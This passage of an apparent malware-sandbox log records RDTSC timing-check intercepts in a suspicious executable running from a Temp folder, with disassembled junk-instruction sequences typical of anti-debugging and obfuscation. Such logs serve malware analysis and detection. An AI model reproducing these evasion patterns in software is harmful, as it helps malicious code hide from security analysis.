Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70C3B second address: 4B70C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70C3F second address: 4B70C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70C43 second address: 4B70C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70C52 second address: 4B70C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70C56 second address: 4B70C5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B609F4 second address: 4B60A18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 9Bh 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FD81D0C8432h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60A18 second address: 4B60A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60A1C second address: 4B60A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60A22 second address: 4B60AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007FD81C888261h 0x0000000c jmp 00007FD81C88825Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FD81C888266h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD81C88825Dh 0x00000026 and ch, FFFFFFC6h 0x00000029 jmp 00007FD81C888261h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FD81C888260h 0x00000035 adc cx, D568h 0x0000003a jmp 00007FD81C88825Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60AAB second address: 4B60AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60AB1 second address: 4B60AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60AB5 second address: 4B60ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD81D0C842Ah 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60ACA second address: 4B60ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC010E second address: 4BC012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C8439h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC012B second address: 4BC014F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD81C888269h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC014F second address: 4BC018D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FD81D0C842Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 jmp 00007FD81D0C842Dh 0x00000019 popad 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC018D second address: 4BC0191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0191 second address: 4BC0197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0197 second address: 4BC019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0008 second address: 4BC000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC000C second address: 4BC0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0012 second address: 4BC005C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81D0C8431h 0x00000009 add esi, 2FEC3CB6h 0x0000000f jmp 00007FD81D0C8431h 0x00000014 popfd 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD81D0C8432h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC005C second address: 4BC0060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0060 second address: 4BC0066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0066 second address: 4BC006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC006C second address: 4BC0070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0070 second address: 4BC0074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0074 second address: 4BC0091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD81D0C842Eh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0091 second address: 4BC00A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC00A0 second address: 4BC00CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD81D0C842Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B70CE9 second address: 4B70D56 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD81C888263h 0x00000008 sub ah, 0000006Eh 0x0000000b jmp 00007FD81C888269h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD81C88825Ch 0x0000001d or eax, 6C954FE8h 0x00000023 jmp 00007FD81C88825Bh 0x00000028 popfd 0x00000029 movzx eax, dx 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FD81C88825Eh 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC051B second address: 4BC0521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0521 second address: 4BC0525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0525 second address: 4BC0529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0529 second address: 4BC0589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c mov bx, 3CC0h 0x00000010 pushfd 0x00000011 jmp 00007FD81C888269h 0x00000016 and ax, 94C6h 0x0000001b jmp 00007FD81C888261h 0x00000020 popfd 0x00000021 popad 0x00000022 and dword ptr [eax+04h], 00000000h 0x00000026 pushad 0x00000027 mov edx, eax 0x00000029 mov ebx, esi 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FD81C888261h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0589 second address: 4BC058F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC058F second address: 4BC0593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC0593 second address: 4BC0597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60957 second address: 4B6095D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B6095D second address: 4B60963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60963 second address: 4B60985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888266h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bl, cl 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B60985 second address: 4B60989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BB0788 second address: 4BB07B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C88825Eh 0x00000009 xor ch, FFFFFF98h 0x0000000c jmp 00007FD81C88825Bh 0x00000011 popfd 0x00000012 mov bl, al 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BB07B4 second address: 4BB07CC instructions: 0x00000000 rdtsc 0x00000002 mov ch, 74h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, di 0x00000009 popad 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, 611CEB2Fh 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BB07CC second address: 4BB07EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov si, 05E9h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4BC02A1 second address: 4BC030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD81D0C8431h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FD81D0C842Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007FD81D0C8430h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD81D0C8437h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B8092D second address: 4B809E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C888267h 0x00000009 xor eax, 5BA5526Eh 0x0000000f jmp 00007FD81C888269h 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ebp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD81C888266h 0x00000023 and ax, 4118h 0x00000028 jmp 00007FD81C88825Bh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FD81C888268h 0x00000034 xor eax, 54282B78h 0x0000003a jmp 00007FD81C88825Bh 0x0000003f popfd 0x00000040 popad 0x00000041 mov dword ptr [esp], ebp 0x00000044 jmp 00007FD81C888266h 0x00000049 mov ebp, esp 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e movzx eax, dx 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B809E5 second address: 4B80A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD81D0C8430h 0x0000000f or ecx, 7665F768h 0x00000015 jmp 00007FD81D0C842Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov eax, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD81D0C8435h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B80A40 second address: 4B80A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B80A46 second address: 4B80A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B40285 second address: 4B4028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 74AAF764h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B4028F second address: 4B40295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B40295 second address: 4B40299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B40299 second address: 4B402B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD81D0C842Ah 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B402B1 second address: 4B402B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B402B5 second address: 4B402BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B402BB second address: 4B40337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ah 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD81C888261h 0x00000014 and eax, 4D6513B6h 0x0000001a jmp 00007FD81C888261h 0x0000001f popfd 0x00000020 mov ax, 8DA7h 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 jmp 00007FD81C88825Ah 0x0000002b push eax 0x0000002c jmp 00007FD81C88825Bh 0x00000031 xchg eax, ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FD81C88825Bh 0x0000003b jmp 00007FD81C888263h 0x00000040 popfd 0x00000041 movzx esi, di 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B40337 second address: 4B403A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81D0C8430h 0x00000009 or cl, FFFFFF98h 0x0000000c jmp 00007FD81D0C842Bh 0x00000011 popfd 0x00000012 mov eax, 37F4AD4Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c mov cx, F747h 0x00000020 mov bh, cl 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FD81D0C842Bh 0x0000002d and ecx, 0CCD790Eh 0x00000033 jmp 00007FD81D0C8439h 0x00000038 popfd 0x00000039 mov esi, 6E942617h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B403A1 second address: 4B40453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e mov di, FDCCh 0x00000012 popad 0x00000013 mov ebx, dword ptr [ebp+10h] 0x00000016 pushad 0x00000017 jmp 00007FD81C888261h 0x0000001c jmp 00007FD81C888260h 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 jmp 00007FD81C888260h 0x00000028 push eax 0x00000029 pushad 0x0000002a mov al, bh 0x0000002c mov bx, ax 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 jmp 00007FD81C888264h 0x00000036 mov esi, dword ptr [ebp+08h] 0x00000039 jmp 00007FD81C888260h 0x0000003e xchg eax, edi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov dl, 1Bh 0x00000044 pushfd 0x00000045 jmp 00007FD81C888266h 0x0000004a sub ecx, 63EA3438h 0x00000050 jmp 00007FD81C88825Bh 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B40453 second address: 4B4046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C8434h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B4046B second address: 4B4046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B4046F second address: 4B404A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD81D0C842Eh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 mov dl, ah 0x00000012 mov edx, 6B20A75Eh 0x00000017 popad 0x00000018 test esi, esi 0x0000001a pushad 0x0000001b mov di, 4436h 0x0000001f mov al, bh 0x00000021 popad 0x00000022 je 00007FD88F4C65A1h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B404A6 second address: 4B404AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B404AA second address: 4B404B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 4B404B0 second address: 4B404FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C888268h 0x00000009 adc esi, 24392288h 0x0000000f jmp 00007FD81C88825Bh 0x00000014 popfd 0x00000015 mov ah, 9Ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD81C88825Dh 0x0000002a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B404FB second address: 4B40501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
